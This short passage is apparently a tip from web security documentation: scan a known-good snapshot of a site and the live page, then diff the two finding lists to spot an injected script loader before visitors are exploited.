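Run this against a known-good snapshot of the site as well as the live page: the diff between the two finding lists is what an injected loader looks like before any visitor's browser has been exploited.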